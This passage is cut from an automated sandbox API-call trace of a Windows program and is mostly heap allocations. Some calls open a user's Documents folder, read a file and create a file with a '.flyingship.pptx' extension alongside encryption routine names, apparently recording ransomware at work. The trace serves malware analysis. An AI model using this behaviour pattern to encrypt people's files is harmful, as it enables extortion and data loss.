Flags=0x0, Size=0x38) returned 0x90ae18 [0171.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0171.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0171.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0171.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0171.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0171.520] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0171.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0171.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.flyingship.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kuxyygupccske_knyra.flyingship.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0171.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0171.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0171.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0171.523] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0171.523] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x4d63, lpOverlapped=0x0) returned 1 [0171.526] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0171.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4d63) returned 0x900440 [0171.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0171.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0171.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4d63) returned 0x9e5190 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900440 | out: hHeap=0x8a0000) returned 1 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4d63) returned 0x900440 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900440 | out: hHeap=0x8a0000) returned 1 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0171.527] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.528] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0171.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0171.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4d63) returned 0x900440 [0171.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0171.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0171.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0171.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4d63) returned 0x9e9f00 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0171.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0171.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0171.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0171.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0171.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.530] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0171.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0171.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0171.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2728 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0171.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.531] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0171.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0171.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.532] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0171.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.532] RtlAllocateHeap 